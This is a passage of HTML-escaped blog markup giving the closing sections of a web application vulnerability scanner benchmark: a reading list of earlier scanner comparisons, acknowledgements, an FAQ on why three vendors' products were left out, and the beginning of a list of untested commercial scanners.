&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;21. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Recommended Reading List: Scanner
Benchmarks&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The following resources include additional information on
previous benchmarks, comparisons and assessments in the field of web
application vulnerability scanners:&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l8 level1 lfo1; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://resources.infosecinstitute.com/sql-injection-http-headers/&quot;&gt;&quot;SQL
Injection through HTTP Headers&quot;&lt;/a&gt;, by Yasser Aboukir (an analysis and
enhancement of the 2011 60 scanners benchmark, with a different approach for
interpreting the results, March 2012)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l8 level1 lfo1; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectooladdict.blogspot.co.il/2011/08/commercial-web-application-scanner.html&quot;&gt;&quot;The
Scanning Legion: Web Application Scanners Accuracy Assessment &amp;amp; Feature Comparison&quot;&lt;/a&gt;,
one of the predecessors of the current benchmark, by Shay Chen (a comparison of
60 commercial &amp;amp; open source scanners, August 2011)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l8 level1 lfo1; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://andrewpetukhov.blogspot.com/2011/08/building-benchmark-for-sql-injection.html&quot;&gt;&quot;Building
a Benchmark for SQL Injection Scanners&quot;&lt;/a&gt;, by Andrew Petukhov (a
commercial &amp;amp; opensource scanner SQL injection benchmark with a generator
that produces 27680 (&lt;b&gt;!!!&lt;/b&gt;) test cases, August 2011)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l8 level1 lfo1; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;https://www.infosecisland.com/blogview/12935-Webapp-Scanner-Review-Acunetix-Versus-Netsparker.html&quot;&gt;Webapp
Scanner Review: Acunetix versus Netsparker&quot;,&lt;/a&gt; by Mark Baldwin
(commercial scanner comparison, April 2011)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l8 level1 lfo1; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://staff.science.uva.nl/~delaat/sne-2010-2011/p27/report.pdf&quot;&gt;Effectiveness
of Automated Application Penetration Testing Tools&lt;/a&gt;&quot;, by Alexandre
Miguel Ferreira and Harald Kleppe (commercial &amp;amp; freeware scanner comparison,
February 2011)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l8 level1 lfo1; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://sectooladdict.blogspot.com/2010/12/web-application-scanner-benchmark.html&quot;&gt;Web
Application Scanners Accuracy Assessment&lt;/a&gt;&quot;, one of the predecessors of
the current benchmark, by Shay Chen (a comparison of 43 free &amp;amp; open source
scanners, December 2010)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l8 level1 lfo1; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;https://www.owasp.org/images/2/28/Black_Box_Scanner_Presentation.pdf&quot;&gt;State
of the Art: Automated Black-Box Web Application Vulnerability Testing&lt;/a&gt;&quot;
(&lt;a href=&quot;http://theory.stanford.edu/~jcm/papers/pci_oakland10.pdf&quot;&gt;Original
Paper&lt;/a&gt;), by Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell (May 2010)
– original paper&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l8 level1 lfo1; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://www.ntobjectives.com/files/Accuracy_and_Time_Costs_of_Web_App_Scanners.pdf&quot;&gt;Analyzing
the Accuracy and Time Costs of Web Application Security Scanners&lt;/a&gt;&quot;, by
Larry Suto (commercial scanners comparison, February 2010)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l8 level1 lfo1; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://www.cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf&quot;&gt;Why
Johnny Can’t Pentest: An Analysis of Black-box Web Vulnerability Scanners&lt;/a&gt;&quot;,
by Adam Doup´e, Marco Cova, Giovanni Vigna (commercial &amp;amp; open source
scanner comparison, 2010)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l8 level1 lfo1; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://www.darknet.org.uk/content/files/WebVulnScanners.pdf&quot;&gt;Web
Vulnerability Scanner Evaluation&lt;/a&gt;&quot;, by AnantaSec (commercial scanner
comparison, January 2009)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l8 level1 lfo1; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://ha.ckers.org/files/CoverageOfWebAppScanners.zip&quot;&gt;Analyzing the
Effectiveness and Coverage of Web Application Security Scanners&lt;/a&gt;&quot;, by
Larry Suto (commercial scanners comparison, October 2007)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l8 level1 lfo1; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://www.informationweek.com/news/202201216&quot;&gt;Rolling Review: Web App
Scanners Still Have Trouble with Ajax&lt;/a&gt;&quot;, by Jordan Wiens (commercial
scanners comparison, October 2007)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;mso-list: l8 level1 lfo1; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&quot;&lt;a href=&quot;http://www.virtualforge.de/whitepapers/web_scanner_benchmark.pdf&quot;&gt;Web
Application Vulnerability Scanners – a Benchmark&lt;/a&gt;&quot; , by Andreas
Wiegenstein, Frederik Weidemann, Dr. Markus Schumacher, Sebastian Schinzel (Anonymous
scanners&amp;nbsp; comparison, October 2006)&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;22. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Thank-You Note&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
During the research described in this article, I have
received help from plenty of individuals and resources, and I’d like to take
the opportunity to thank them all.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
I might be reusing the texts, due to the late night hour and
the constant lack of sleep I have been through in the last couple of months,
but I mean every word that is written here.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
For all the &lt;b&gt;open source&lt;/b&gt; &lt;b&gt;tool authors&lt;/b&gt; that
assisted me in testing the various tools in unreasonable late night hours and
bothered to adjust their tools for me, discuss their various features and invest
their time in explaining how I can optimize their use,&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
For the &lt;b&gt;kind souls&lt;/b&gt; that helped me obtain evaluation
licenses for commercial products, for the &lt;b&gt;CEO&#39;s, Marketing Executives,&lt;/b&gt; &lt;b&gt;QA
engineers, Support and Development teams&lt;/b&gt; of commercial vendors, which saved
me tons of time, supported me throughout the process, helped me overcome
obstacles and proved to me that the process of interacting with a commercial
vendor can be a pleasant one, and for the various individuals that helped me
contact these vendors.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
I can&#39;t thank you enough, and wish you all the best.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
For the information sources that helped me gather the list
of scanners over the years, and gain knowledge, ideas, and insights, including
(but not limited to) information security sources such as &lt;b&gt;Security Sh3ll&lt;/b&gt;
(&lt;a href=&quot;http://security-sh3ll.blogspot.com/&quot;&gt;http://security-sh3ll.blogspot.com/&lt;/a&gt;),
&lt;b&gt;PenTestIT&lt;/b&gt; (&lt;a href=&quot;http://www.pentestit.com/&quot;&gt;http://www.pentestit.com/&lt;/a&gt;),
&lt;b&gt;The Hacker News (&lt;/b&gt;&lt;a href=&quot;http://thehackernews.com/&quot;&gt;http://thehackernews.com/&lt;/a&gt;&lt;b&gt;),
Toolswatch (&lt;/b&gt;&lt;a href=&quot;http://www.vulnerabilitydatabase.com/toolswatch/&quot;&gt;http://www.vulnerabilitydatabase.com/toolswatch/&lt;/a&gt;),
&lt;b&gt;Darknet&lt;/b&gt; (&lt;a href=&quot;http://www.darknet.org.uk/&quot;&gt;http://www.darknet.org.uk/&lt;/a&gt;),
&lt;b&gt;Packet Storm&lt;/b&gt; (&lt;a href=&quot;http://packetstormsecurity.org/&quot;&gt;http://packetstormsecurity.org/&lt;/a&gt;),
&lt;b&gt;Google&lt;/b&gt; (of course), &lt;b&gt;Twitter&lt;/b&gt; (my latest addiction) and many others
great sources that I have used over the years to gather the list of tools.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
I hope that the conclusions, ideas, information and payloads
presented in this research (and the benchmarks and tools that will follow) will
contribute to all the vendors, projects and most importantly, testers that
choose to rely on them. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;23. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;FAQ - Why Didn&#39;t You Test NTO, Cenzic
and N-Stalker?&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Prior to the benchmark, I made an important decision. I
decided to go through official channels, and either contact vendors and work
with them, or use public evaluation versions of relatively &lt;b&gt;simple&lt;/b&gt;
products. I had a huge amount of tasks, and needed the support to cut the
learning curve of understanding how optimize the tools. I was determined to
meet my deadline, didn&#39;t have any time to spare, and was willing to make
certain sacrifices to meet my goals.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;&lt;i&gt;As for why specific vendors
were not included, this is the short answer:&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;NTO: &lt;/b&gt;I only managed to get in touch with NTO about two
weeks before the benchmark publication. I didn&#39;t have luck contacting the guys
I worked with in the previous benchmarks, but was eventually contacted by Kim
Dinerman. She was nice and polite, and apologized for the time the process
took. After explaining to her which timeframe they have for enhancing the
product (an action performed by other commercial vendors as well, in order to prepare
for the publically known tests of the benchmark), they decided that the
timeframe and circumstances don&#39;t provide an even opportunity and decided not
to participate. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
I admit that by the time they contacted me, I was so loaded
with tasks, that it was somewhat relieved, even though I was curious and wanted
to assess their product. That being said, I decided prior to the benchmark that
I will respect the decisions of vendors, even if will cause me to not get to a
round scanner number.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;N-Stalker: &lt;/b&gt;I finally&lt;b&gt; &lt;/b&gt;received a valid
N-Stalker license one day before the publication of the benchmark - a couple of
days after the final deadline I had for accepting any tool. I decided to give
it a shot, just in case it will be a simple process, however, with my luck, I
immediately discovered a bug that prevented me from properly assessing the
product and it&#39;s features, and unlike the rest of tests which were performed
with a sufficient timeframe... this time, I had no time to find a workaround. I
decided not to publish the partial results I had (I did not want to create the
wrong impression or hurt anyone&#39;s business), and notified the vendor on the bug
and on my decision.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The vendor, from his part, thanked me for the bug report,
and promised to look up the issue. Sorry guys... I wanted to test them too...
next benchmark.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Cenzic:&lt;/b&gt; the story of Cenzic is much simpler than the
rest. I simply didn&#39;t manage to get in touch, and even though I did have access
to a license, I decided prior to the benchmark not to take that approach. As I
mentioned earlier, I decided to respect the vendor decisions, and not
to assess their product without their support. &lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3792178847867987053&quot; name=&quot;_Toc329957523&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=3792178847867987053&quot; name=&quot;_Ref280855248&quot;&gt;&lt;/a&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;24. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Appendix A
– List of Tools &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Not Included In the Test&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The following &lt;b&gt;&lt;i&gt;commercial&lt;/i&gt;&lt;/b&gt; web application
vulnerability scanners were &lt;b&gt;&lt;i&gt;not included&lt;/i&gt;&lt;/b&gt;&lt;i&gt; &lt;/i&gt;in the benchmark,
due to deadlines and time restrictions from my part, and in the case of
specific vendors, for other reasons. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;Commercial Scanners not included in this benchmark&lt;/u&gt;&lt;/b&gt;&lt;u&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l22 level1 lfo18; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.nstalker.com/&quot;&gt;&lt;b&gt;&lt;i&gt;N-Stalker&lt;/i&gt;&lt;/b&gt; &lt;b&gt;&lt;i&gt;Commercial
Edition&lt;/i&gt;&lt;/b&gt;&lt;/a&gt; (N-Stalker) &lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l22 level1 lfo18; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.cenzic.com/technology/index.html&quot;&gt;&lt;b&gt;Hailstorm&lt;/b&gt;&lt;/a&gt; (Cenzic)
&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l22 level1 lfo18; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.ntobjectives.com/security-software/ntospider-application-security-scanner/&quot;&gt;&lt;b&gt;NTOSpider&lt;/b&gt;&lt;/a&gt;
(NTO) &lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l22 level1 lfo18; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.mcafee.com/us/products/vulnerability-manager.aspx&quot;&gt;&lt;b&gt;&lt;i&gt;McAfee
Vulnerability Manager&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(McAfee / Foundstone)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l22 level1 lfo18; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.rapid7.com/products/nexpose-enterprise-edition.jsp&quot;&gt;&lt;b&gt;&lt;i&gt;NeXpose
Enterprise Edition Web Application Scanning Features&lt;/i&gt;&lt;/b&gt;&lt;/a&gt; (Rapid7)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l22 level1 lfo18; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.eeye.com/Products/Retina/Web-Security-Scanner.aspx&quot;&gt;&lt;b&gt;&lt;i&gt;Retina
Web Application Scanner&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt; &lt;/i&gt;&lt;/b&gt;(eEye Digital Security)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l22 level1 lfo18; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.saintcorporation.com/products/software/saintScanner.html&quot;&gt;&lt;b&gt;SAINT
Scanner&lt;/b&gt;&lt;/a&gt; Web Application Scanning Features (SAINT co.)&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l22 level1 lfo18; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.ncircle.com/index.php?s=products_webapp360&quot;&gt;&lt;b&gt;&lt;i&gt;WebApp360&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;
&lt;/i&gt;&lt;/b&gt;(NCircle)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l22 level1 lfo18; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://www.coresecurity.com/content/web-app-pro&quot;&gt;&lt;b&gt;&lt;i&gt;Core Impact Pro
